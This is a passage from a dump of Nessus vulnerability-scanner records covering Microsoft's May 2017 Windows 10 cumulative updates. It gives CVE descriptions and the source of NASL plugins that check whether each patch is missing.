script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in 